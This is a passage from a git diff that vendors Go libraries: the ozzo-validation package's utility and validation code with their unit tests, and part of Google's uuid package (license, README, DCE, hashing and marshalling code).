&validateInternalError{})}, "error internal"}, + } + for _, test := range tests { + err := ValidateStruct(test.model, test.rules...) + assertError(t, test.err, err, test.tag) + } + + // embedded struct + err := Validate(&m3) + if assert.NotNil(t, err) { + assert.Equal(t, "A: error abc.", err.Error()) + } + + a := struct { + Name string + Value string + }{"name", "demo"} + err = ValidateStruct(&a, + Field(&a.Name, Required), + Field(&a.Value, Required, Length(5, 10)), + ) + if assert.NotNil(t, err) { + assert.Equal(t, "Value: the length must be between 5 and 10.", err.Error()) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/util.go b/vendor/github.com/go-ozzo/ozzo-validation/util.go new file mode 100644 index 0000000000..2c1c5881c3 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/util.go @@ -0,0 +1,157 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "database/sql/driver" + "errors" + "fmt" + "reflect" +) + +var ( + bytesType = reflect.TypeOf([]byte(nil)) + valuerType = reflect.TypeOf((*driver.Valuer)(nil)).Elem() +) + +// EnsureString ensures the given value is a string. +// If the value is a byte slice, it will be typecast into a string. +// An error is returned otherwise. +func EnsureString(value interface{}) (string, error) { + v := reflect.ValueOf(value) + if v.Kind() == reflect.String { + return v.String(), nil + } + if v.Type() == bytesType { + return string(v.Interface().([]byte)), nil + } + return "", errors.New("must be either a string or byte slice") +} + +// StringOrBytes typecasts a value into a string or byte slice. +// Boolean flags are returned to indicate if the typecasting succeeds or not. +func StringOrBytes(value interface{}) (isString bool, str string, isBytes bool, bs []byte) { + v := reflect.ValueOf(value) + if v.Kind() == reflect.String { + str = v.String() + isString = true + } else if v.Kind() == reflect.Slice && v.Type() == bytesType { + bs = v.Interface().([]byte) + isBytes = true + } + return +} + +// LengthOfValue returns the length of a value that is a string, slice, map, or array. +// An error is returned for all other types. +func LengthOfValue(value interface{}) (int, error) { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.String, reflect.Slice, reflect.Map, reflect.Array: + return v.Len(), nil + } + return 0, fmt.Errorf("cannot get the length of %v", v.Kind()) +} + +// ToInt converts the given value to an int64. +// An error is returned for all incompatible types. +func ToInt(value interface{}) (int64, error) { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return v.Int(), nil + } + return 0, fmt.Errorf("cannot convert %v to int64", v.Kind()) +} + +// ToUint converts the given value to an uint64. +// An error is returned for all incompatible types. +func ToUint(value interface{}) (uint64, error) { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return v.Uint(), nil + } + return 0, fmt.Errorf("cannot convert %v to uint64", v.Kind()) +} + +// ToFloat converts the given value to a float64. +// An error is returned for all incompatible types. +func ToFloat(value interface{}) (float64, error) { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.Float32, reflect.Float64: + return v.Float(), nil + } + return 0, fmt.Errorf("cannot convert %v to float64", v.Kind()) +} + +// IsEmpty checks if a value is empty or not. +// A value is considered empty if +// - integer, float: zero +// - bool: false +// - string, array: len() == 0 +// - slice, map: nil or len() == 0 +// - interface, pointer: nil or the referenced value is empty +func IsEmpty(value interface{}) bool { + v := reflect.ValueOf(value) + switch v.Kind() { + case reflect.String, reflect.Array, reflect.Map, reflect.Slice: + return v.Len() == 0 + case reflect.Bool: + return !v.Bool() + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return v.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return v.Uint() == 0 + case reflect.Float32, reflect.Float64: + return v.Float() == 0 + case reflect.Invalid: + return true + case reflect.Interface, reflect.Ptr: + if v.IsNil() { + return true + } + return IsEmpty(v.Elem().Interface()) + } + + return false +} + +// Indirect returns the value that the given interface or pointer references to. +// If the value implements driver.Valuer, it will deal with the value returned by +// the Value() method instead. A boolean value is also returned to indicate if +// the value is nil or not (only applicable to interface, pointer, map, and slice). +// If the value is neither an interface nor a pointer, it will be returned back. +func Indirect(value interface{}) (interface{}, bool) { + rv := reflect.ValueOf(value) + kind := rv.Kind() + switch kind { + case reflect.Invalid: + return nil, true + case reflect.Ptr, reflect.Interface: + if rv.IsNil() { + return nil, true + } + return Indirect(rv.Elem().Interface()) + case reflect.Slice, reflect.Map, reflect.Func, reflect.Chan: + if rv.IsNil() { + return nil, true + } + } + + if rv.Type().Implements(valuerType) { + return indirectValuer(value.(driver.Valuer)) + } + + return value, false +} + +func indirectValuer(valuer driver.Valuer) (interface{}, bool) { + if value, err := valuer.Value(); value != nil && err == nil { + return Indirect(value) + } + return nil, true +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/util_test.go b/vendor/github.com/go-ozzo/ozzo-validation/util_test.go new file mode 100644 index 0000000000..28a6d5161a --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/util_test.go @@ -0,0 +1,293 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "testing" + + "database/sql" + + "github.com/stretchr/testify/assert" +) + +func TestEnsureString(t *testing.T) { + str := "abc" + bytes := []byte("abc") + + tests := []struct { + tag string + value interface{} + expected string + hasError bool + }{ + {"t1", "abc", "abc", false}, + {"t2", &str, "", true}, + {"t3", bytes, "abc", false}, + {"t4", &bytes, "", true}, + {"t5", 100, "", true}, + } + for _, test := range tests { + s, err := EnsureString(test.value) + if test.hasError { + assert.NotNil(t, err, test.tag) + } else { + assert.Nil(t, err, test.tag) + assert.Equal(t, test.expected, s, test.tag) + } + } +} + +type MyString string + +func TestStringOrBytes(t *testing.T) { + str := "abc" + bytes := []byte("abc") + var str2 string + var bytes2 []byte + var str3 MyString = "abc" + var str4 *string + + tests := []struct { + tag string + value interface{} + str string + bs []byte + isString bool + isBytes bool + }{ + {"t1", str, "abc", nil, true, false}, + {"t2", &str, "", nil, false, false}, + {"t3", bytes, "", []byte("abc"), false, true}, + {"t4", &bytes, "", nil, false, false}, + {"t5", 100, "", nil, false, false}, + {"t6", str2, "", nil, true, false}, + {"t7", &str2, "", nil, false, false}, + {"t8", bytes2, "", nil, false, true}, + {"t9", &bytes2, "", nil, false, false}, + {"t10", str3, "abc", nil, true, false}, + {"t11", &str3, "", nil, false, false}, + {"t12", str4, "", nil, false, false}, + } + for _, test := range tests { + isString, str, isBytes, bs := StringOrBytes(test.value) + assert.Equal(t, test.str, str, test.tag) + assert.Equal(t, test.bs, bs, test.tag) + assert.Equal(t, test.isString, isString, test.tag) + assert.Equal(t, test.isBytes, isBytes, test.tag) + } +} + +func TestLengthOfValue(t *testing.T) { + var a [3]int + + tests := []struct { + tag string + value interface{} + length int + err string + }{ + {"t1", "abc", 3, ""}, + {"t2", []int{1, 2}, 2, ""}, + {"t3", map[string]int{"A": 1, "B": 2}, 2, ""}, + {"t4", a, 3, ""}, + {"t5", &a, 0, "cannot get the length of ptr"}, + {"t6", 123, 0, "cannot get the length of int"}, + } + + for _, test := range tests { + l, err := LengthOfValue(test.value) + assert.Equal(t, test.length, l, test.tag) + assertError(t, test.err, err, test.tag) + } +} + +func TestToInt(t *testing.T) { + var a int + + tests := []struct { + tag string + value interface{} + result int64 + err string + }{ + {"t1", 1, 1, ""}, + {"t2", int8(1), 1, ""}, + {"t3", int16(1), 1, ""}, + {"t4", int32(1), 1, ""}, + {"t5", int64(1), 1, ""}, + {"t6", &a, 0, "cannot convert ptr to int64"}, + {"t7", uint(1), 0, "cannot convert uint to int64"}, + {"t8", float64(1), 0, "cannot convert float64 to int64"}, + {"t9", "abc", 0, "cannot convert string to int64"}, + {"t10", []int{1, 2}, 0, "cannot convert slice to int64"}, + {"t11", map[string]int{"A": 1}, 0, "cannot convert map to int64"}, + } + + for _, test := range tests { + l, err := ToInt(test.value) + assert.Equal(t, test.result, l, test.tag) + assertError(t, test.err, err, test.tag) + } +} + +func TestToUint(t *testing.T) { + var a int + var b uint + + tests := []struct { + tag string + value interface{} + result uint64 + err string + }{ + {"t1", uint(1), 1, ""}, + {"t2", uint8(1), 1, ""}, + {"t3", uint16(1), 1, ""}, + {"t4", uint32(1), 1, ""}, + {"t5", uint64(1), 1, ""}, + {"t6", 1, 0, "cannot convert int to uint64"}, + {"t7", &a, 0, "cannot convert ptr to uint64"}, + {"t8", &b, 0, "cannot convert ptr to uint64"}, + {"t9", float64(1), 0, "cannot convert float64 to uint64"}, + {"t10", "abc", 0, "cannot convert string to uint64"}, + {"t11", []int{1, 2}, 0, "cannot convert slice to uint64"}, + {"t12", map[string]int{"A": 1}, 0, "cannot convert map to uint64"}, + } + + for _, test := range tests { + l, err := ToUint(test.value) + assert.Equal(t, test.result, l, test.tag) + assertError(t, test.err, err, test.tag) + } +} + +func TestToFloat(t *testing.T) { + var a int + var b uint + + tests := []struct { + tag string + value interface{} + result float64 + err string + }{ + {"t1", float32(1), 1, ""}, + {"t2", float64(1), 1, ""}, + {"t3", 1, 0, "cannot convert int to float64"}, + {"t4", uint(1), 0, "cannot convert uint to float64"}, + {"t5", &a, 0, "cannot convert ptr to float64"}, + {"t6", &b, 0, "cannot convert ptr to float64"}, + {"t7", "abc", 0, "cannot convert string to float64"}, + {"t8", []int{1, 2}, 0, "cannot convert slice to float64"}, + {"t9", map[string]int{"A": 1}, 0, "cannot convert map to float64"}, + } + + for _, test := range tests { + l, err := ToFloat(test.value) + assert.Equal(t, test.result, l, test.tag) + assertError(t, test.err, err, test.tag) + } +} + +func TestIsEmpty(t *testing.T) { + var s1 string + var s2 string = "a" + var s3 *string + s4 := struct{}{} + tests := []struct { + tag string + value interface{} + empty bool + }{ + // nil + {"t0", nil, true}, + // string + {"t1.1", "", true}, + {"t1.2", "1", false}, + {"t1.3", MyString(""), true}, + {"t1.4", MyString("1"), false}, + // slice + {"t2.1", []byte(""), true}, + {"t2.2", []byte("1"), false}, + // map + {"t3.1", map[string]int{}, true}, + {"t3.2", map[string]int{"a": 1}, false}, + // bool + {"t4.1", false, true}, + {"t4.2", true, false}, + // int + {"t5.1", int(0), true}, + {"t5.2", int8(0), true}, + {"t5.3", int16(0), true}, + {"t5.4", int32(0), true}, + {"t5.5", int64(0), true}, + {"t5.6", int(1), false}, + {"t5.7", int8(1), false}, + {"t5.8", int16(1), false}, + {"t5.9", int32(1), false}, + {"t5.10", int64(1), false}, + // uint + {"t6.1", uint(0), true}, + {"t6.2", uint8(0), true}, + {"t6.3", uint16(0), true}, + {"t6.4", uint32(0), true}, + {"t6.5", uint64(0), true}, + {"t6.6", uint(1), false}, + {"t6.7", uint8(1), false}, + {"t6.8", uint16(1), false}, + {"t6.9", uint32(1), false}, + {"t6.10", uint64(1), false}, + // float + {"t7.1", float32(0), true}, + {"t7.2", float64(0), true}, + {"t7.3", float32(1), false}, + {"t7.4", float64(1), false}, + // interface, ptr + {"t8.1", &s1, true}, + {"t8.2", &s2, false}, + {"t8.3", s3, true}, + // struct + {"t9.1", s4, false}, + {"t9.2", &s4, false}, + } + + for _, test := range tests { + empty := IsEmpty(test.value) + assert.Equal(t, test.empty, empty, test.tag) + } +} + +func TestIndirect(t *testing.T) { + var a int = 100 + var b *int + var c *sql.NullInt64 + + tests := []struct { + tag string + value interface{} + result interface{} + isNil bool + }{ + {"t1", 100, 100, false}, + {"t2", &a, 100, false}, + {"t3", b, nil, true}, + {"t4", nil, nil, true}, + {"t5", sql.NullInt64{Int64: 0, Valid: false}, nil, true}, + {"t6", sql.NullInt64{Int64: 1, Valid: false}, nil, true}, + {"t7", &sql.NullInt64{Int64: 0, Valid: false}, nil, true}, + {"t8", &sql.NullInt64{Int64: 1, Valid: false}, nil, true}, + {"t9", sql.NullInt64{Int64: 0, Valid: true}, int64(0), false}, + {"t10", sql.NullInt64{Int64: 1, Valid: true}, int64(1), false}, + {"t11", &sql.NullInt64{Int64: 0, Valid: true}, int64(0), false}, + {"t12", &sql.NullInt64{Int64: 1, Valid: true}, int64(1), false}, + {"t13", c, nil, true}, + } + + for _, test := range tests { + result, isNil := Indirect(test.value) + assert.Equal(t, test.result, result, test.tag) + assert.Equal(t, test.isNil, isNil, test.tag) + } +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/validation.go b/vendor/github.com/go-ozzo/ozzo-validation/validation.go new file mode 100644 index 0000000000..1633258178 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/validation.go @@ -0,0 +1,133 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +// Package validation provides configurable and extensible rules for validating data of various types. +package validation + +import ( + "fmt" + "reflect" + "strconv" +) + +type ( + // Validatable is the interface indicating the type implementing it supports data validation. + Validatable interface { + // Validate validates the data and returns an error if validation fails. + Validate() error + } + + // Rule represents a validation rule. + Rule interface { + // Validate validates a value and returns a value if validation fails. + Validate(value interface{}) error + } + + // RuleFunc represents a validator function. + // You may wrap it as a Rule by calling By(). + RuleFunc func(value interface{}) error +) + +var ( + // ErrorTag is the struct tag name used to customize the error field name for a struct field. + ErrorTag = "json" + + // Skip is a special validation rule that indicates all rules following it should be skipped. + Skip = &skipRule{} + + validatableType = reflect.TypeOf((*Validatable)(nil)).Elem() +) + +// Validate validates the given value and returns the validation error, if any. +// +// Validate performs validation using the following steps: +// - validate the value against the rules passed in as parameters +// - if the value is a map and the map values implement `Validatable`, call `Validate` of every map value +// - if the value is a slice or array whose values implement `Validatable`, call `Validate` of every element +func Validate(value interface{}, rules ...Rule) error { + for _, rule := range rules { + if _, ok := rule.(*skipRule); ok { + return nil + } + if err := rule.Validate(value); err != nil { + return err + } + } + + rv := reflect.ValueOf(value) + if (rv.Kind() == reflect.Ptr || rv.Kind() == reflect.Interface) && rv.IsNil() { + return nil + } + + if v, ok := value.(Validatable); ok { + return v.Validate() + } + + switch rv.Kind() { + case reflect.Map: + if rv.Type().Elem().Implements(validatableType) { + return validateMap(rv) + } + case reflect.Slice, reflect.Array: + if rv.Type().Elem().Implements(validatableType) { + return validateSlice(rv) + } + case reflect.Ptr, reflect.Interface: + return Validate(rv.Elem().Interface()) + } + + return nil +} + +// validateMap validates a map of validatable elements +func validateMap(rv reflect.Value) error { + errs := Errors{} + for _, key := range rv.MapKeys() { + if mv := rv.MapIndex(key).Interface(); mv != nil { + if err := mv.(Validatable).Validate(); err != nil { + errs[fmt.Sprintf("%v", key.Interface())] = err + } + } + } + if len(errs) > 0 { + return errs + } + return nil +} + +// validateMap validates a slice/array of validatable elements +func validateSlice(rv reflect.Value) error { + errs := Errors{} + l := rv.Len() + for i := 0; i < l; i++ { + if ev := rv.Index(i).Interface(); ev != nil { + if err := ev.(Validatable).Validate(); err != nil { + errs[strconv.Itoa(i)] = err + } + } + } + if len(errs) > 0 { + return errs + } + return nil +} + +type skipRule struct{} + +func (r *skipRule) Validate(interface{}) error { + return nil +} + +type inlineRule struct { + f RuleFunc +} + +func (r *inlineRule) Validate(value interface{}) error { + return r.f(value) +} + +// By wraps a RuleFunc into a Rule. +func By(f RuleFunc) Rule { + return &inlineRule{f} +} diff --git a/vendor/github.com/go-ozzo/ozzo-validation/validation_test.go b/vendor/github.com/go-ozzo/ozzo-validation/validation_test.go new file mode 100644 index 0000000000..27ac6cb764 --- /dev/null +++ b/vendor/github.com/go-ozzo/ozzo-validation/validation_test.go @@ -0,0 +1,145 @@ +// Copyright 2016 Qiang Xue. All rights reserved. +// Use of this source code is governed by a MIT-style +// license that can be found in the LICENSE file. + +package validation + +import ( + "errors" + "strings" + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestValidate(t *testing.T) { + slice := []String123{String123("abc"), String123("123"), String123("xyz")} + mp := map[string]String123{"c": String123("abc"), "b": String123("123"), "a": String123("xyz")} + tests := []struct { + tag string + value interface{} + err string + }{ + {"t1", 123, ""}, + {"t2", String123("123"), ""}, + {"t3", String123("abc"), "error 123"}, + {"t4", []String123{}, ""}, + {"t5", slice, "0: error 123; 2: error 123."}, + {"t6", &slice, "0: error 123; 2: error 123."}, + {"t7", mp, "a: error 123; c: error 123."}, + {"t8", &mp, "a: error 123; c: error 123."}, + {"t9", map[string]String123{}, ""}, + } + for _, test := range tests { + err := Validate(test.value) + assertError(t, test.err, err, test.tag) + } + + // with rules + err := Validate("123", &validateAbc{}, &validateXyz{}) + if assert.NotNil(t, err) { + assert.Equal(t, "error abc", err.Error()) + } + err = Validate("abc", &validateAbc{}, &validateXyz{}) + if assert.NotNil(t, err) { + assert.Equal(t, "error xyz", err.Error()) + } + err = Validate("abcxyz", &validateAbc{}, &validateXyz{}) + assert.Nil(t, err) + + err = Validate("123", &validateAbc{}, Skip, &validateXyz{}) + if assert.NotNil(t, err) { + assert.Equal(t, "error abc", err.Error()) + } + err = Validate("abc", &validateAbc{}, Skip, &validateXyz{}) + assert.Nil(t, err) +} + +func TestBy(t *testing.T) { + abcRule := By(func(value interface{}) error { + s, _ := value.(string) + if s != "abc" { + return errors.New("must be abc") + } + return nil + }) + assert.Nil(t, Validate("abc", abcRule)) + err := Validate("xyz", abcRule) + if assert.NotNil(t, err) { + assert.Equal(t, "must be abc", err.Error()) + } +} + +func Test_skipRule_Validate(t *testing.T) { + assert.Nil(t, Skip.Validate(100)) +} + +func assertError(t *testing.T, expected string, err error, tag string) { + if expected == "" { + assert.Nil(t, err, tag) + } else if assert.NotNil(t, err, tag) { + assert.Equal(t, expected, err.Error(), tag) + } +} + +type validateAbc struct{} + +func (v *validateAbc) Validate(obj interface{}) error { + if !strings.Contains(obj.(string), "abc") { + return errors.New("error abc") + } + return nil +} + +type validateXyz struct{} + +func (v *validateXyz) Validate(obj interface{}) error { + if !strings.Contains(obj.(string), "xyz") { + return errors.New("error xyz") + } + return nil +} + +type validateInternalError struct{} + +func (v *validateInternalError) Validate(obj interface{}) error { + if strings.Contains(obj.(string), "internal") { + return NewInternalError(errors.New("error internal")) + } + return nil +} + +type Model1 struct { + A string + B string + c string + D *string + E String123 + F *String123 + G string `json:"g"` +} + +type String123 string + +func (s String123) Validate() error { + if !strings.Contains(string(s), "123") { + return errors.New("error 123") + } + return nil +} + +type Model2 struct { + Model3 + M3 Model3 + B string +} + +type Model3 struct { + A string +} + +func (m Model3) Validate() error { + return ValidateStruct(&m, + Field(&m.A, &validateAbc{}), + ) +} diff --git a/vendor/github.com/google/uuid/.travis.yml b/vendor/github.com/google/uuid/.travis.yml new file mode 100644 index 0000000000..d8156a60ba --- /dev/null +++ b/vendor/github.com/google/uuid/.travis.yml @@ -0,0 +1,9 @@ +language: go + +go: + - 1.4.3 + - 1.5.3 + - tip + +script: + - go test -v ./... diff --git a/vendor/github.com/google/uuid/CONTRIBUTING.md b/vendor/github.com/google/uuid/CONTRIBUTING.md new file mode 100644 index 0000000000..04fdf09f13 --- /dev/null +++ b/vendor/github.com/google/uuid/CONTRIBUTING.md @@ -0,0 +1,10 @@ +# How to contribute + +We definitely welcome patches and contribution to this project! + +### Legal requirements + +In order to protect both you and ourselves, you will need to sign the +[Contributor License Agreement](https://cla.developers.google.com/clas). + +You may have already signed it for other Google projects. diff --git a/vendor/github.com/google/uuid/CONTRIBUTORS b/vendor/github.com/google/uuid/CONTRIBUTORS new file mode 100644 index 0000000000..b4bb97f6bc --- /dev/null +++ b/vendor/github.com/google/uuid/CONTRIBUTORS @@ -0,0 +1,9 @@ +Paul Borman +bmatsuo +shawnps +theory +jboverfelt +dsymonds +cd1 +wallclockbuilder +dansouza diff --git a/vendor/github.com/google/uuid/LICENSE b/vendor/github.com/google/uuid/LICENSE new file mode 100644 index 0000000000..5dc68268d9 --- /dev/null +++ b/vendor/github.com/google/uuid/LICENSE @@ -0,0 +1,27 @@ +Copyright (c) 2009,2014 Google Inc. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/vendor/github.com/google/uuid/README.md b/vendor/github.com/google/uuid/README.md new file mode 100644 index 0000000000..21205eaeb5 --- /dev/null +++ b/vendor/github.com/google/uuid/README.md @@ -0,0 +1,23 @@ +**This package is currently in development and the API may not be stable.** + +The API will become stable with v1. + +# uuid ![build status](https://travis-ci.org/google/uuid.svg?branch=master) +The uuid package generates and inspects UUIDs based on +[RFC 4122](http://tools.ietf.org/html/rfc4122) +and DCE 1.1: Authentication and Security Services. + +This package is based on the github.com/pborman/uuid package (previously named +code.google.com/p/go-uuid). It differs from these earlier packages in that +a UUID is a 16 byte array rather than a byte slice. One loss due to this +change is the ability to represent an invalid UUID (vs a NIL UUID). + +###### Install +`go get github.com/google/uuid` + +###### Documentation +[![GoDoc](https://godoc.org/github.com/google/uuid?status.svg)](http://godoc.org/github.com/google/uuid) + +Full `go doc` style documentation for the package can be viewed online without +installing this package by using the GoDoc site here: +http://godoc.org/github.com/google/uuid diff --git a/vendor/github.com/google/uuid/dce.go b/vendor/github.com/google/uuid/dce.go new file mode 100644 index 0000000000..a6479dbae0 --- /dev/null +++ b/vendor/github.com/google/uuid/dce.go @@ -0,0 +1,80 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "encoding/binary" + "fmt" + "os" +) + +// A Domain represents a Version 2 domain +type Domain byte + +// Domain constants for DCE Security (Version 2) UUIDs. +const ( + Person = Domain(0) + Group = Domain(1) + Org = Domain(2) +) + +// NewDCESecurity returns a DCE Security (Version 2) UUID. +// +// The domain should be one of Person, Group or Org. +// On a POSIX system the id should be the users UID for the Person +// domain and the users GID for the Group. The meaning of id for +// the domain Org or on non-POSIX systems is site defined. +// +// For a given domain/id pair the same token may be returned for up to +// 7 minutes and 10 seconds. +func NewDCESecurity(domain Domain, id uint32) (UUID, error) { + uuid, err := NewUUID() + if err == nil { + uuid[6] = (uuid[6] & 0x0f) | 0x20 // Version 2 + uuid[9] = byte(domain) + binary.BigEndian.PutUint32(uuid[0:], id) + } + return uuid, err +} + +// NewDCEPerson returns a DCE Security (Version 2) UUID in the person +// domain with the id returned by os.Getuid. +// +// NewDCEPerson(Person, uint32(os.Getuid())) +func NewDCEPerson() (UUID, error) { + return NewDCESecurity(Person, uint32(os.Getuid())) +} + +// NewDCEGroup returns a DCE Security (Version 2) UUID in the group +// domain with the id returned by os.Getgid. +// +// NewDCEGroup(Group, uint32(os.Getgid())) +func NewDCEGroup() (UUID, error) { + return NewDCESecurity(Group, uint32(os.Getgid())) +} + +// Domain returns the domain for a Version 2 UUID. Domains are only defined +// for Version 2 UUIDs. +func (uuid UUID) Domain() Domain { + return Domain(uuid[9]) +} + +// ID returns the id for a Version 2 UUID. IDs are only defined for Version 2 +// UUIDs. +func (uuid UUID) ID() uint32 { + return binary.BigEndian.Uint32(uuid[0:4]) +} + +func (d Domain) String() string { + switch d { + case Person: + return "Person" + case Group: + return "Group" + case Org: + return "Org" + } + return fmt.Sprintf("Domain%d", int(d)) +} diff --git a/vendor/github.com/google/uuid/doc.go b/vendor/github.com/google/uuid/doc.go new file mode 100644 index 0000000000..5b8a4b9af8 --- /dev/null +++ b/vendor/github.com/google/uuid/doc.go @@ -0,0 +1,12 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// Package uuid generates and inspects UUIDs. +// +// UUIDs are based on RFC 4122 and DCE 1.1: Authentication and Security +// Services. +// +// A UUID is a 16 byte (128 bit) array. UUIDs may be used as keys to +// maps or compared directly. +package uuid diff --git a/vendor/github.com/google/uuid/hash.go b/vendor/github.com/google/uuid/hash.go new file mode 100644 index 0000000000..4fc5a77df5 --- /dev/null +++ b/vendor/github.com/google/uuid/hash.go @@ -0,0 +1,53 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "crypto/md5" + "crypto/sha1" + "hash" +) + +// Well known namespace IDs and UUIDs +var ( + NameSpaceDNS = Must(Parse("6ba7b810-9dad-11d1-80b4-00c04fd430c8")) + NameSpaceURL = Must(Parse("6ba7b811-9dad-11d1-80b4-00c04fd430c8")) + NameSpaceOID = Must(Parse("6ba7b812-9dad-11d1-80b4-00c04fd430c8")) + NameSpaceX500 = Must(Parse("6ba7b814-9dad-11d1-80b4-00c04fd430c8")) + Nil UUID // empty UUID, all zeros +) + +// NewHash returns a new UUID derived from the hash of space concatenated with +// data generated by h. The hash should be at least 16 byte in length. The +// first 16 bytes of the hash are used to form the UUID. The version of the +// UUID will be the lower 4 bits of version. NewHash is used to implement +// NewMD5 and NewSHA1. +func NewHash(h hash.Hash, space UUID, data []byte, version int) UUID { + h.Reset() + h.Write(space[:]) + h.Write([]byte(data)) + s := h.Sum(nil) + var uuid UUID + copy(uuid[:], s) + uuid[6] = (uuid[6] & 0x0f) | uint8((version&0xf)<<4) + uuid[8] = (uuid[8] & 0x3f) | 0x80 // RFC 4122 variant + return uuid +} + +// NewMD5 returns a new MD5 (Version 3) UUID based on the +// supplied name space and data. It is the same as calling: +// +// NewHash(md5.New(), space, data, 3) +func NewMD5(space UUID, data []byte) UUID { + return NewHash(md5.New(), space, data, 3) +} + +// NewSHA1 returns a new SHA1 (Version 5) UUID based on the +// supplied name space and data. It is the same as calling: +// +// NewHash(sha1.New(), space, data, 5) +func NewSHA1(space UUID, data []byte) UUID { + return NewHash(sha1.New(), space, data, 5) +} diff --git a/vendor/github.com/google/uuid/json_test.go b/vendor/github.com/google/uuid/json_test.go new file mode 100644 index 0000000000..245f91edfb --- /dev/null +++ b/vendor/github.com/google/uuid/json_test.go @@ -0,0 +1,62 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "encoding/json" + "reflect" + "testing" +) + +var testUUID = Must(Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479")) + +func TestJSON(t *testing.T) { + type S struct { + ID1 UUID + ID2 UUID + } + s1 := S{ID1: testUUID} + data, err := json.Marshal(&s1) + if err != nil { + t.Fatal(err) + } + var s2 S + if err := json.Unmarshal(data, &s2); err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(&s1, &s2) { + t.Errorf("got %#v, want %#v", s2, s1) + } +} + +func BenchmarkUUID_MarshalJSON(b *testing.B) { + x := &struct { + UUID UUID `json:"uuid"` + }{} + var err error + x.UUID, err = Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479") + if err != nil { + b.Fatal(err) + } + for i := 0; i < b.N; i++ { + js, err := json.Marshal(x) + if err != nil { + b.Fatalf("marshal json: %#v (%v)", js, err) + } + } +} + +func BenchmarkUUID_UnmarshalJSON(b *testing.B) { + js := []byte(`{"uuid":"f47ac10b-58cc-0372-8567-0e02b2c3d479"}`) + var x *struct { + UUID UUID `json:"uuid"` + } + for i := 0; i < b.N; i++ { + err := json.Unmarshal(js, &x) + if err != nil { + b.Fatalf("marshal json: %#v (%v)", js, err) + } + } +} diff --git a/vendor/github.com/google/uuid/marshal.go b/vendor/github.com/google/uuid/marshal.go new file mode 100644 index 0000000000..84bbc5880b --- /dev/null +++ b/vendor/github.com/google/uuid/marshal.go @@ -0,0 +1,39 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import "fmt" + +// MarshalText implements encoding.TextMarshaler. +func (uuid UUID) MarshalText() ([]byte, error) { + var js [36]byte + encodeHex(js[:], uuid) + return js[:], nil +} + +// UnmarshalText implements encoding.TextUnmarshaler. +func (uuid *UUID) UnmarshalText(data []byte) error { + // See comment in ParseBytes why we do this. + // id, err := ParseBytes(data) + id, err := ParseBytes(data) + if err == nil { + *uuid = id + } + return err +} + +// MarshalBinary implements encoding.BinaryMarshaler. +func (uuid UUID) MarshalBinary() ([]byte, error) { + return uuid[:], nil +} + +// UnmarshalBinary implements encoding.BinaryUnmarshaler. +func (uuid *UUID) UnmarshalBinary(data []byte) error { + if len(data) != 16 { + return fmt.Errorf("invalid UUID (got %d bytes)", len(data)) + } + copy(uuid[:], data) + return nil +} diff --git a/vendor/github.com/google/uuid/node.go b/vendor/github.com/google/uuid/node.go new file mode 100644 index 0000000000..5f0156a2e6 --- 